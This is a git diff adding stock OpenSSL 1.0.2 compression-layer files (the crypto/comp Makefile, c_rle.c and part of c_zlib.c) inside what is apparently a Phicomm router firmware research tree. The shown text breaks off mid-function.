zzi$;$K%r^=`a9M#2d=+A{euJ7--nJkaQ(gKa|f=!_ZVgE8=9@!Rk&Jld0nIL;<2XM
zGV#Hrj9xw(WvlQ4tSsJ24@B-S^BZM&8P-gngvwf4tymfU<#M|Cq@tczw<OBi;&|5<
zw>DrXF^sLjtMA%oDlY#Itpq$MR7N{^%~8(}tGv<ODy;OQaUSl-G;`93yxBpU9kfSP
z{iN*_ja6x7&^s||7vo2`aw|ciz3-S;<IednLkIEvzmE4~Eb*LyA8&eodPm2bo?l<*
zpp)*)IT7yjCQ5+zUcBjX`buX6eb4F2)Oe23y_1&qKy-AZxaX~0jW6LK?zR0jd^>K4
zr*r%QH9miorj%Fb_$I*F{J($>$!JB2G5LQietNw2f3~@4+%iQ_qRuI_{iRTHjwhZ@
l-vct%PouwvagjP#%cs-rN6S>U@hj<2jdqv3r2jhY|G!(+C$j(m

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/Makefile
new file mode 100644
index 0000000..efda832
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/Makefile
@@ -0,0 +1,108 @@
+#
+# OpenSSL/crypto/comp/Makefile
+#
+
+DIR=	comp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= comp_lib.c comp_err.c \
+	c_rle.c c_zlib.c
+
+LIBOBJ=	comp_lib.o comp_err.o \
+	c_rle.o c_zlib.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= comp.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+c_rle.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_rle.o: ../../include/openssl/comp.h ../../include/openssl/crypto.h
+c_rle.o: ../../include/openssl/e_os2.h ../../include/openssl/obj_mac.h
+c_rle.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+c_rle.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+c_rle.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+c_rle.o: ../../include/openssl/symhacks.h c_rle.c
+c_zlib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_zlib.o: ../../include/openssl/comp.h ../../include/openssl/crypto.h
+c_zlib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_zlib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+c_zlib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+c_zlib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+c_zlib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+c_zlib.o: ../../include/openssl/symhacks.h c_zlib.c
+comp_err.o: ../../include/openssl/bio.h ../../include/openssl/comp.h
+comp_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+comp_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+comp_err.o: ../../include/openssl/opensslconf.h
+comp_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+comp_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+comp_err.o: ../../include/openssl/symhacks.h comp_err.c
+comp_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+comp_lib.o: ../../include/openssl/comp.h ../../include/openssl/crypto.h
+comp_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/obj_mac.h
+comp_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+comp_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+comp_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+comp_lib.o: ../../include/openssl/symhacks.h comp_lib.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/Makefile.save
new file mode 100644
index 0000000..efda832
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/Makefile.save
@@ -0,0 +1,108 @@
+#
+# OpenSSL/crypto/comp/Makefile
+#
+
+DIR=	comp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= comp_lib.c comp_err.c \
+	c_rle.c c_zlib.c
+
+LIBOBJ=	comp_lib.o comp_err.o \
+	c_rle.o c_zlib.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= comp.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+c_rle.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_rle.o: ../../include/openssl/comp.h ../../include/openssl/crypto.h
+c_rle.o: ../../include/openssl/e_os2.h ../../include/openssl/obj_mac.h
+c_rle.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+c_rle.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+c_rle.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+c_rle.o: ../../include/openssl/symhacks.h c_rle.c
+c_zlib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_zlib.o: ../../include/openssl/comp.h ../../include/openssl/crypto.h
+c_zlib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_zlib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+c_zlib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+c_zlib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+c_zlib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+c_zlib.o: ../../include/openssl/symhacks.h c_zlib.c
+comp_err.o: ../../include/openssl/bio.h ../../include/openssl/comp.h
+comp_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+comp_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+comp_err.o: ../../include/openssl/opensslconf.h
+comp_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+comp_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+comp_err.o: ../../include/openssl/symhacks.h comp_err.c
+comp_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+comp_lib.o: ../../include/openssl/comp.h ../../include/openssl/crypto.h
+comp_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/obj_mac.h
+comp_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+comp_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+comp_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+comp_lib.o: ../../include/openssl/symhacks.h comp_lib.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/c_rle.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/c_rle.c
new file mode 100644
index 0000000..e9aabbd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/c_rle.c
@@ -0,0 +1,62 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/objects.h>
+#include <openssl/comp.h>
+
+static int rle_compress_block(COMP_CTX *ctx, unsigned char *out,
+                              unsigned int olen, unsigned char *in,
+                              unsigned int ilen);
+static int rle_expand_block(COMP_CTX *ctx, unsigned char *out,
+                            unsigned int olen, unsigned char *in,
+                            unsigned int ilen);
+
+static COMP_METHOD rle_method = {
+    NID_rle_compression,
+    LN_rle_compression,
+    NULL,
+    NULL,
+    rle_compress_block,
+    rle_expand_block,
+    NULL,
+    NULL,
+};
+
+COMP_METHOD *COMP_rle(void)
+{
+    return (&rle_method);
+}
+
+static int rle_compress_block(COMP_CTX *ctx, unsigned char *out,
+                              unsigned int olen, unsigned char *in,
+                              unsigned int ilen)
+{
+    /* int i; */
+
+    if (ilen == 0 || olen < (ilen - 1)) {
+        /* ZZZZZZZZZZZZZZZZZZZZZZ */
+        return (-1);
+    }
+
+    *(out++) = 0;
+    memcpy(out, in, ilen);
+    return (ilen + 1);
+}
+
+static int rle_expand_block(COMP_CTX *ctx, unsigned char *out,
+                            unsigned int olen, unsigned char *in,
+                            unsigned int ilen)
+{
+    int i;
+
+    if (olen < (ilen - 1)) {
+        /* ZZZZZZZZZZZZZZZZZZZZZZ */
+        return (-1);
+    }
+
+    i = *(in++);
+    if (i == 0) {
+        memcpy(out, in, ilen - 1);
+    }
+    return (ilen - 1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/c_zlib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/c_zlib.c
new file mode 100644
index 0000000..6731af8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/c_zlib.c
@@ -0,0 +1,762 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/objects.h>
+#include <openssl/comp.h>
+#include <openssl/err.h>
+
+COMP_METHOD *COMP_zlib(void);
+
+static COMP_METHOD zlib_method_nozlib = {
+    NID_undef,
+    "(undef)",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+};
+
+#ifndef ZLIB
+# undef ZLIB_SHARED
+#else
+
+# include <zlib.h>
+
+static int zlib_stateful_init(COMP_CTX *ctx);
+static void zlib_stateful_finish(COMP_CTX *ctx);
+static int zlib_stateful_compress_block(COMP_CTX *ctx, unsigned char *out,
+                                        unsigned int olen, unsigned char *in,
+                                        unsigned int ilen);
+static int zlib_stateful_expand_block(COMP_CTX *ctx, unsigned char *out,
+                                      unsigned int olen, unsigned char *in,
+                                      unsigned int ilen);
+
+/* memory allocations functions for zlib intialization */
+static void *zlib_zalloc(void *opaque, unsigned int no, unsigned int size)
+{
+    void *p;
+
+    p = OPENSSL_malloc(no * size);
+    if (p)
+        memset(p, 0, no * size);
+    return p;
+}
+
+static void zlib_zfree(void *opaque, void *address)
+{
+    OPENSSL_free(address);
+}
+
+# if 0
+static int zlib_compress_block(COMP_CTX *ctx, unsigned char *out,
+                               unsigned int olen, unsigned char *in,
+                               unsigned int ilen);
+static int zlib_expand_block(COMP_CTX *ctx, unsigned char *out,
+                             unsigned int olen, unsigned char *in,
+                             unsigned int ilen);
+
+static int zz_uncompress(Bytef *dest, uLongf * destLen, const Bytef *source,
+                         uLong sourceLen);
+
+static COMP_METHOD zlib_stateless_method = {
+    NID_zlib_compression,
+    LN_zlib_compression,
+    NULL,
+    NULL,
+    zlib_compress_block,
+    zlib_expand_block,
+    NULL,
+    NULL,
+};
+# endif
+
+static COMP_METHOD zlib_stateful_method = {
+    NID_zlib_compression,
+    LN_zlib_compression,
+    zlib_stateful_init,
+    zlib_stateful_finish,
+    zlib_stateful_compress_block,
+    zlib_stateful_expand_block,
+    NULL,
+    NULL,
+};
+
+/*
+ * When OpenSSL is built on Windows, we do not want to require that
+ * the ZLIB.DLL be available in order for the OpenSSL DLLs to
+ * work.  Therefore, all ZLIB routines are loaded at run time
+ * and we do not link to a .LIB file when ZLIB_SHARED is set.
+ */
+# if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_WIN32)
+#  include <windows.h>
+# endif                         /* !(OPENSSL_SYS_WINDOWS ||
+                                 * OPENSSL_SYS_WIN32) */
+
+# ifdef ZLIB_SHARED
+#  include <openssl/dso.h>
+
+/* Function pointers */
+typedef int (*compress_ft) (Bytef *dest, uLongf * destLen,
+                            const Bytef *source, uLong sourceLen);
+typedef int (*inflateEnd_ft) (z_streamp strm);
+typedef int (*inflate_ft) (z_streamp strm, int flush);
+typedef int (*inflateInit__ft) (z_streamp strm,
+                                const char *version, int stream_size);
+typedef int (*deflateEnd_ft) (z_streamp strm);
+typedef int (*deflate_ft) (z_streamp strm, int flush);
+typedef int (*deflateInit__ft) (z_streamp strm, int level,
+                                const char *version, int stream_size);
+typedef const char *(*zError__ft) (int err);
+static compress_ft p_compress = NULL;
+static inflateEnd_ft p_inflateEnd = NULL;
+static inflate_ft p_inflate = NULL;
+static inflateInit__ft p_inflateInit_ = NULL;
+static deflateEnd_ft p_deflateEnd = NULL;
+static deflate_ft p_deflate = NULL;
+static deflateInit__ft p_deflateInit_ = NULL;
+static zError__ft p_zError = NULL;
+
+static int zlib_loaded = 0;     /* only attempt to init func pts once */
+static DSO *zlib_dso = NULL;
+
+#  define compress                p_compress
+#  define inflateEnd              p_inflateEnd
+#  define inflate                 p_inflate
+#  define inflateInit_            p_inflateInit_
+#  define deflateEnd              p_deflateEnd
+#  define deflate                 p_deflate
+#  define deflateInit_            p_deflateInit_
+#  define zError                  p_zError
+# endif                         /* ZLIB_SHARED */
+
+struct zlib_state {
+    z_stream istream;
+    z_stream ostream;
+};
+
+static int zlib_stateful_ex_idx = -1;
+
+static int zlib_stateful_init(COMP_CTX *ctx)
+{
+    int err;
+    struct zlib_state *state =
+        (struct zlib_state *)OPENSSL_malloc(sizeof(struct zlib_state));
+
+    if (state == NULL)
+        goto err;
+
+    state->istream.zalloc = zlib_zalloc;
+    state->istream.zfree = zlib_zfree;
+    state->istream.opaque = Z_NULL;
+    state->istream.next_in = Z_NULL;
+    state->istream.next_out = Z_NULL;
+    state->istream.avail_in = 0;
+    state->istream.avail_out = 0;
+    err = inflateInit_(&state->istream, ZLIB_VERSION, sizeof(z_stream));
+    if (err != Z_OK)
+        goto err;
+
+    state->ostream.zalloc = zlib_zalloc;
+    state->ostream.zfree = zlib_zfree;
+    state->ostream.opaque = Z_NULL;
+    state->ostream.next_in = Z_NULL;
+    state->ostream.next_out = Z_NULL;
+    state->ostream.avail_in = 0;
+    state->ostream.avail_out = 0;
+    err = deflateInit_(&state->ostream, Z_DEFAULT_COMPRESSION,
+                       ZLIB_VERSION, sizeof(z_stream));
+    if (err != Z_OK)
+        goto err;
+
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_COMP, ctx, &ctx->ex_data);
+    CRYPTO_set_ex_data(&ctx->ex_data, zlib_stateful_ex_idx, state);
+    return 1;
+ err:
+    if (state)
+        OPENSSL_free(state);
+    return 0;
+}
+
+static void zlib_stateful_finish(COMP_CTX *ctx)
+{
+    struct zlib_state *state =
+        (struct zlib_state *)CRYPTO_get_ex_data(&ctx->ex_data,
+                                                zlib_stateful_ex_idx);
+    inflateEnd(&state->istream);
+    deflateEnd(&state->ostream);
+    OPENSSL_free(state);
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_COMP, ctx, &ctx->ex_data);
+}
+
+static int zlib_stateful_compress_block(COMP_CTX *ctx, unsigned char *out,
+                                        unsigned int olen, unsigned char *in,
+                                        unsigned int ilen)
+{
+    int err = Z_OK;
+    struct zlib_state *state =
+        (struct zlib_state *)CRYPTO_get_ex_data(&ctx->ex_data,
+                                                zlib_stateful_ex_idx);
+
+    if (state == NULL)
+        return -1;
+
+    state->ostream.next_in = in;
+    state->ostream.avail_in = ilen;
+    state->ostream.next_out = out;
+    state->ostream.avail_out = olen;
+    if (ilen > 0)
+        err = deflate(&state->ostream, Z_SYNC_FLUSH);
+    if (err != Z_OK)
+        return -1;
+# ifdef DEBUG_ZLIB
+    fprintf(stderr, "compress(%4d)->%4d %s\n",
+            ilen, olen - state->ostream.avail_out,
+            (ilen != olen - state->ostream.avail_out) ? "zlib" : "clear");
+# endif
+    return olen - state->ostream.avail_out;
+}
+
+static int zlib_stateful_expand_block(COMP_CTX *ctx, unsigned char *out,
+                                      unsigned int olen, unsigned char *in,
+                                      unsigned int ilen)
+{
+    int err = Z_OK;
+
+    struct zlib_state *state =
+        (struct zlib_state *)CRYPTO_get_ex_data(&ctx->ex_data,
+                                                zlib_stateful_ex_idx);
+
+    if (state == NULL)
+        return 0;
+
+    state->istream.next_in = in;
+    state->istream.avail_in = ilen;
+    state->istream.next_out = out;
+    state->istream.avail_out = olen;
+    if (ilen > 0)
+        err = inflate(&state->istream, Z_SYNC_FLUSH);
+    if (err != Z_OK)
+        return -1;
+# ifdef DEBUG_ZLIB
+    fprintf(stderr, "expand(%4d)->%4d %s\n",
+            ilen, olen - state->istream.avail_out,
+            (ilen != olen - state->istream.avail_out) ? "zlib" : "clear");
+# endif
+    return olen - state->istream.avail_out;
+}
+
+# if 0
+static int zlib_compress_block(COMP_CTX *ctx, unsigned char *out,
+                               unsigned int olen, unsigned char *in,
+                               unsigned int ilen)
+{
+    unsigned long l;
+    int i;
+    int clear = 1;
+
+    if (ilen > 128) {
+        out[0] = 1;
+        l = olen - 1;
+        i = compress(&(out[1]), &l, in, (unsigned long)ilen);
+        if (i != Z_OK)
+            return (-1);
+        if (ilen > l) {
+            clear = 0;
+            l++;
+        }
+    }
+    if (clear) {
+        out[0] = 0;
+        memcpy(&(out[1]), in, ilen);
+        l = ilen + 1;
+    }
+#  ifdef DEBUG_ZLIB
+    fprintf(stderr, "compress(%4d)->%4d %s\n",
+            ilen, (int)l, (clear) ? "clear" : "zlib");
+#  endif
+    return ((int)l);
+}
+
+static int zlib_expand_block(COMP_CTX *ctx, unsigned char *out,
+                             unsigned int olen, unsigned char *in,
+                             unsigned int ilen)
+{
+    unsigned long l;
+    int i;
+
+    if (in[0]) {
+        l = olen;
+        i = zz_uncompress(out, &l, &(in[1]), (unsigned long)ilen - 1);
+        if (i != Z_OK)
+            return (-1);
+    } else {
+        memcpy(out, &(in[1]), ilen - 1);
+        l = ilen - 1;
+    }
+#  ifdef DEBUG_ZLIB
+    fprintf(stderr, "expand  (%4d)->%4d %s\n",
+            ilen, (int)l, in[0] ? "zlib" : "clear");
+#  endif
+    return ((int)l);
+}
+
+static int zz_uncompress(Bytef *dest, uLongf * destLen, const Bytef *source,
+                         uLong sourceLen)
+{
+    z_stream stream;
+    int err;
+
+    stream.next_in = (Bytef *)source;
+    stream.avail_in = (uInt) sourceLen;
+    /* Check for source > 64K on 16-bit machine: */
+    if ((uLong) stream.avail_in != sourceLen)
+        return Z_BUF_ERROR;
+
+    stream.next_out = dest;
+    stream.avail_out = (uInt) * destLen;
+    if ((uLong) stream.avail_out != *destLen)
+        return Z_BUF_ERROR;
+
+    stream.zalloc = (alloc_func) 0;
+    stream.zfree = (free_func) 0;
+
+    err = inflateInit_(&stream, ZLIB_VERSION, sizeof(z_stream));
+    if (err != Z_OK)
+        return err;
+
+    err = inflate(&stream, Z_FINISH);
+    if (err != Z_STREAM_END) {
+        inflateEnd(&stream);
+        return err;
+    }
+    *destLen = stream.total_out;
+
+    err = inflateEnd(&stream);
+    return err;
+}
+# endif
+
+#endif
+
+COMP_METHOD *COMP_zlib(void)
+{
+    COMP_METHOD *meth = &zlib_method_nozlib;
+
+#ifdef ZLIB_SHARED
+    if (!zlib_loaded) {
+# if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_WIN32)
+        zlib_dso = DSO_load(NULL, "ZLIB1", NULL, 0);
+# else
+        zlib_dso = DSO_load(NULL, "z", NULL, 0);
+# endif
+        if (zlib_dso != NULL) {
+            p_compress = (compress_ft) DSO_bind_func(zlib_dso, "compress");
+            p_inflateEnd
+                = (inflateEnd_ft) DSO_bind_func(zlib_dso, "inflateEnd");
+            p_inflate = (inflate_ft) DSO_bind_func(zlib_dso, "inflate");
+            p_inflateInit_
+                = (inflateInit__ft) DSO_bind_func(zlib_dso, "inflateInit_");
+            p_deflateEnd
+                = (deflateEnd_ft) DSO_bind_func(zlib_dso, "deflateEnd");
+            p_deflate = (deflate_ft) DSO_bind_func(zlib_dso, "deflate");
+            p_deflateInit_
+                = (deflateInit__ft) DSO_bind_func(zlib_dso, "deflateInit_");
+            p_zError = (zError__ft) DSO_bind_func(zlib_dso, "zError");
+
+            if (p_compress && p_inflateEnd && p_inflate
+                && p_inflateInit_ && p_deflateEnd
+                && p_deflate && p_deflateInit_ && p_zError)
+                zlib_loaded++;
+        }
+    }
+#endif
+#ifdef ZLIB_SHARED
+    if (zlib_loaded)
+#endif
+#if defined(ZLIB) || defined(ZLIB_SHARED)
+    {
+        /*
+         * init zlib_stateful_ex_idx here so that in a multi-process
+         * application it's enough to intialize openssl before forking (idx
+         * will be inherited in all the children)
+         */
+        if (zlib_stateful_ex_idx == -1) {
+            CRYPTO_w_lock(CRYPTO_LOCK_COMP);
+            if (zlib_stateful_ex_idx == -1)
+                zlib_stateful_ex_idx =
+                    CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_COMP,
+                                            0, NULL, NULL, NULL, NULL);
+            CRYPTO_w_unlock(CRYPTO_LOCK_COMP);
+            if (zlib_stateful_ex_idx == -1)
+                goto err;
+        }
+
+        meth = &zlib_stateful_method;
+    }
+ err:
+#endif
+
+    return (meth);
+}
+
+void COMP_zlib_cleanup(void)
+{
+#ifdef ZLIB_SHARED
+    if (zlib_dso)
+        DSO_free(zlib_dso);
+#endif
+}
+
+#ifdef ZLIB
+
+/* Zlib based compression/decompression filter BIO */
+
+typedef struct {
+    unsigned char *ibuf;        /* Input buffer */
+    int ibufsize;               /* Buffer size */
+    z_stream zin;               /* Input decompress context */
+    unsigned char *obuf;        /* Output buffer */
+    int obufsize;               /* Output buffer size */
+    unsigned char *optr;        /* Position in output buffer */
+    int ocount;                 /* Amount of data in output buffer */
+    int odone;                  /* deflate EOF */
+    int comp_level;             /* Compression level to use */
+    z_stream zout;              /* Output compression context */
+} BIO_ZLIB_CTX;
+
+# define ZLIB_DEFAULT_BUFSIZE 1024
+
+static int bio_zlib_new(BIO *bi);
+static int bio_zlib_free(BIO *bi);
+static int bio_zlib_read(BIO *b, char *out, int outl);
+static int bio_zlib_write(BIO *b, const char *in, int inl);
+static long bio_zlib_ctrl(BIO *b, int cmd, long num, void *ptr);
+static long bio_zlib_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp);
+
+static BIO_METHOD bio_meth_zlib = {
+    BIO_TYPE_COMP,
+    "zlib",
+    bio_zlib_write,
+    bio_zlib_read,
+    NULL,
+    NULL,
+    bio_zlib_ctrl,
+    bio_zlib_new,
+    bio_zlib_free,
+    bio_zlib_callback_ctrl
+};
+
+BIO_METHOD *BIO_f_zlib(void)
+{
+    return &bio_meth_zlib;
+}
+
+static int bio_zlib_new(BIO *bi)
+{
+    BIO_ZLIB_CTX *ctx;
+# ifdef ZLIB_SHARED
+    (void)COMP_zlib();
+    if (!zlib_loaded) {
+        COMPerr(COMP_F_BIO_ZLIB_NEW, COMP_R_ZLIB_NOT_SUPPORTED);
+        return 0;
+    }
+# endif
+    ctx = OPENSSL_malloc(sizeof(BIO_ZLIB_CTX));
+    if (!ctx) {
+        COMPerr(COMP_F_BIO_ZLIB_NEW, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ctx->ibuf = NULL;
+    ctx->obuf = NULL;
+    ctx->ibufsize = ZLIB_DEFAULT_BUFSIZE;
+    ctx->obufsize = ZLIB_DEFAULT_BUFSIZE;
+    ctx->zin.zalloc = Z_NULL;
+    ctx->zin.zfree = Z_NULL;
+    ctx->zin.next_in = NULL;
+    ctx->zin.avail_in = 0;
+    ctx->zin.next_out = NULL;
+    ctx->zin.avail_out = 0;
+    ctx->zout.zalloc = Z_NULL;
+    ctx->zout.zfree = Z_NULL;
+    ctx->zout.next_in = NULL;
+    ctx->zout.avail_in = 0;
+    ctx->zout.next_out = NULL;
+    ctx->zout.avail_out = 0;
+    ctx->odone = 0;
+    ctx->comp_level = Z_DEFAULT_COMPRESSION;
+    bi->init = 1;
+    bi->ptr = (char *)ctx;
+    bi->flags = 0;
+    return 1;
+}
+
+static int bio_zlib_free(BIO *bi)
+{
+    BIO_ZLIB_CTX *ctx;
+    if (!bi)
+        return 0;
+    ctx = (BIO_ZLIB_CTX *) bi->ptr;
+    if (ctx->ibuf) {
+        /* Destroy decompress context */
+        inflateEnd(&ctx->zin);
+        OPENSSL_free(ctx->ibuf);
+    }
+    if (ctx->obuf) {
+        /* Destroy compress context */
+        deflateEnd(&ctx->zout);
+        OPENSSL_free(ctx->obuf);
+    }
+    OPENSSL_free(ctx);
+    bi->ptr = NULL;
+    bi->init = 0;
+    bi->flags = 0;
+    return 1;
+}
+
+static int bio_zlib_read(BIO *b, char *out, int outl)
+{
+    BIO_ZLIB_CTX *ctx;
+    int ret;
+    z_stream *zin;
+    if (!out || !outl)
+        return 0;
+    ctx = (BIO_ZLIB_CTX *) b->ptr;
+    zin = &ctx->zin;
+    BIO_clear_retry_flags(b);
+    if (!ctx->ibuf) {
+        ctx->ibuf = OPENSSL_malloc(ctx->ibufsize);
+        if (!ctx->ibuf) {
+            COMPerr(COMP_F_BIO_ZLIB_READ, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        inflateInit(zin);
+        zin->next_in = ctx->ibuf;
+        zin->avail_in = 0;
+    }
+
+    /* Copy output data directly to supplied buffer */
+    zin->next_out = (unsigned char *)out;
+    zin->avail_out = (unsigned int)outl;
+    for (;;) {
+        /* Decompress while data available */
+        while (zin->avail_in) {
+            ret = inflate(zin, 0);
+            if ((ret != Z_OK) && (ret != Z_STREAM_END)) {
+                COMPerr(COMP_F_BIO_ZLIB_READ, COMP_R_ZLIB_INFLATE_ERROR);
+                ERR_add_error_data(2, "zlib error:", zError(ret));
+                return 0;
+            }
+            /* If EOF or we've read everything then return */
+            if ((ret == Z_STREAM_END) || !zin->avail_out)
+                return outl - zin->avail_out;
+        }
+
+        /*
+         * No data in input buffer try to read some in, if an error then
+         * return the total data read.
+         */
+        ret = BIO_read(b->next_bio, ctx->ibuf, ctx->ibufsize);
+        if (ret <= 0) {
+            /* Total data read */
+            int tot = outl - zin->avail_out;
+            BIO_copy_next_retry(b);
+            if (ret < 0)
+                return (tot > 0) ? tot : ret;
